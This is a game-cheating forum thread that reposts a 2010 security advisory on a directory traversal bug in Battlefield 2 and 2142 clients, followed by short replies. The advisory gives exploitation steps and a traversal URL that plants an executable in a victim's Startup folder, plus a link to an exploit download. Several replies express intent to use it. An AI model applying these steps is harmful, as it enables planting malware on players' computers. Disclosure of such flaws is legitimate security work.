Results 1 to 13 of 13
  1. #1
    cruizrisner's Avatar
    Join Date
    Feb 2010
    Gender
    male
    Posts
    382
    Reputation
    22
    Thanks
    48

    Battlefield 2 and Battlefield 2142 Multiple Arbitrary file upload

    Code:
    ====================================================================
    EA Battlefield 2 and Battlefield 2142 Multiple Arbitrary File Upload 
    ====================================================================
    
    
    #######################################################################
     
    Luigi Auriemma
     
    Application: Refractor 2 engine
    Games: Battlefield 2 <= 1.50 (aka 1.5.3153-802.0)
    http://www.battlefield.ea.com/battlefield/bf2/
    Battlefield 2142 <= 1.50 (aka 1.10.48.0)
    http://battlefield.ea.com/battlefield/bf2142/
    ...
    other games developed with the same engine could be
    vulnerable like Battlefield Heroes
    Platforms: Windows
    Bug: client URLs directory traversal
    Exploitation: remote, versus clients
    Date: 29 Jun 2010
    Author: Luigi Auriemma
    e-mail: aluigi@autistici.org
    web: aluigi.org
     
     
    #######################################################################
     
     
    1) Introduction
    2) Bug
    3) The Code
    4) Fix
     
     
    #######################################################################
     
    ===============
    1) Introduction
    ===============
     
     
    The Battlefield series is one of the most famous and played series of
    games deeply devoted to multiplayer gaming.
    The series is developed by DICE (http://www.dice.se) and published by
    Electronic Arts.
     
     
    #######################################################################
     
    ======
    2) Bug
    ======
     
     
    Each BF2 and BF2142 server has some fields where the admin can specify
    the links to files and images like the sponsor and community logo.
    The sponsor logo is visible immediately when the client gets the list
    of servers and selects the server with the mouse (one-click, not join)
    while the second one is loaded when the client joins that server.
     
    Exist also other URLs like DemoDownloadURL, DemoIndexURL and
    CustomMapsURL that can be exploited when the client joins the malicious
    server.
     
    The client performs a very simple operation, it gets the URL and
    downloads the file saving it locally using its original name in the
    following folder:
    C:\Documents and Settings\USER\My Documents\Battlefield 2\LogoCache\SERVER
    C:\Documents and Settings\USER\My Documents\Battlefield
    2142\LogoCache\SERVER
    where USER is the Windows account of the current user and SERVER is the
    address of the web server, while LogoCache could be HttpCache if are
    used the URLs for downloading demos and maps.
     
    The vulnerability resides in the missing handling of the backslash char
    with the consequence that the name of the file will include the
    classical directory traversal pattern allowing a malicious server to
    upload malicious executables on the clients.
     
    Note that the loading of the URLs is automatic and doesn't seem
    possible to disable this feature.
     
     
    #######################################################################
     
    ===========
    3) The Code
    ===========
     
     
    http://www.exploit-db.com/sploits/bfonlywebs.zip
     
    - launch: onlywebs.exe c:\malicious_file.exe
    - start the server launcher using the following string as sponsor and
    community logo URL:
    http://SERVER/..\..\..\..\Start Menu\Programs\Startup\owned.exe
    - Save and Start the server
    - launch the client and go in the multiplayer menu
    - when the refreshing of the list is terminated select or join the
    malicious server
    - now the file owned.exe will be available in the Startup folder of the
    client and will be executed at the next login or reboot
     
    note that the server could be not seen if you are running it on the
    same machine of the client (127.0.0.1), in that case use another
    computer/vm (a server or an UDP datapipe on port 29900)
     
     
    #######################################################################
     
    ======
    4) Fix
    ======
     
     
    No fix.
     
     
    #######################################################################

  2. #2
    JussoFreshJr's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Location
    Yo Daddys House
    Posts
    625
    Reputation
    -17
    Thanks
    769
    My Mood
    Sick
    Nice Job, i could really use this

  3. #3
    ndawng's Avatar
    Join Date
    Jan 2009
    Gender
    male
    Posts
    46
    Reputation
    10
    Thanks
    1
    WOW nice bro !

  4. #4
    jono12333's Avatar
    Join Date
    Aug 2009
    Gender
    male
    Location
    newzealand, wellington
    Posts
    456
    Reputation
    11
    Thanks
    55
    My Mood
    Happy
    i like it nice!

  5. #5
    pownd666's Avatar
    Join Date
    Mar 2010
    Gender
    male
    Location
    ass hole
    Posts
    6
    Reputation
    10
    Thanks
    0
    is this the game??

  6. #6
    killer6's Avatar
    Join Date
    Feb 2010
    Gender
    male
    Posts
    27
    Reputation
    10
    Thanks
    1
    My Mood
    Confused
    dude this didnot work....
    can u help me plz?
    like get a youtube vid or something...!!

  7. #7
    Niku ・( ̄∀ ̄)・'s Avatar
    Join Date
    Jul 2009
    Gender
    female
    Location
    Arian
    Posts
    4,320
    Reputation
    474
    Thanks
    639
    My Mood
    Aggressive
    Dude..don't bump at old thread please
    "Holding anger is a poison. It eats you from inside. We think that hating is a weapon that attacks the person who harmed us. But hatred is a curved blade. And the harms we do, we do to ourselves."-Mitch Albom

  8. #8
    Ghost's Avatar
    Join Date
    Jun 2009
    Gender
    male
    Location
    Under your bed, watching you sleep.
    Posts
    24,580
    Reputation
    3317
    Thanks
    3,563
    Quote Originally Posted by pownd666 View Post
    is this the game??
    nice bump brah


  9. #9
    §☻$oo$☻§'s Avatar
    Join Date
    Aug 2010
    Gender
    male
    Posts
    335
    Reputation
    11
    Thanks
    69
    My Mood
    Shocked
    Thanks love it!

  10. #10
    To be at the top, you need the confidence to stand alone.
    Former Staff
    Donator
    heythere123's Avatar
    Join Date
    May 2010
    Gender
    male
    Location
    Around the Block!
    Posts
    9,022
    Reputation
    1174
    Thanks
    1,943
    VERY GOOOD THIS IS AWESOME

  11. #11
    Niku ・( ̄∀ ̄)・'s Avatar
    Join Date
    Jul 2009
    Gender
    female
    Location
    Arian
    Posts
    4,320
    Reputation
    474
    Thanks
    639
    My Mood
    Aggressive
    both of u..stop bumping an old thread
    "Holding anger is a poison. It eats you from inside. We think that hating is a weapon that attacks the person who harmed us. But hatred is a curved blade. And the harms we do, we do to ourselves."-Mitch Albom

  12. #12
    phoenix478's Avatar
    Join Date
    Jul 2010
    Gender
    male
    Posts
    33
    Reputation
    10
    Thanks
    2
    very nicee ,

  13. #13
    Sxoxi's Avatar
    Join Date
    Aug 2010
    Gender
    male
    Posts
    24
    Reputation
    10
    Thanks
    1
    Nice Job, i could really use this

Similar Threads

  1. battlefield 2142 hack?
    By anderon32 in forum C++/C Programming
    Replies: 2
    Last Post: 05-09-2009, 05:18 PM
  2. Battlefield 2142 hack?
    By anderon32 in forum Battlefield 2 Hacks & Cheats
    Replies: 0
    Last Post: 05-06-2009, 06:10 PM
  3. [FREE SERIALS]Battlefield 2142
    By PuRe in forum Battlefield 2 Hacks & Cheats
    Replies: 15
    Last Post: 04-13-2009, 06:45 PM
  4. [REQUEST] is there a battlefield 2142 hack?
    By anderon32 in forum Battlefield 2 Hacks & Cheats
    Replies: 2
    Last Post: 03-17-2009, 04:21 PM
  5. Battlefield 2142 problems
    By fight28982 in forum Battlefield 2 Hacks & Cheats
    Replies: 2
    Last Post: 12-04-2007, 12:47 PM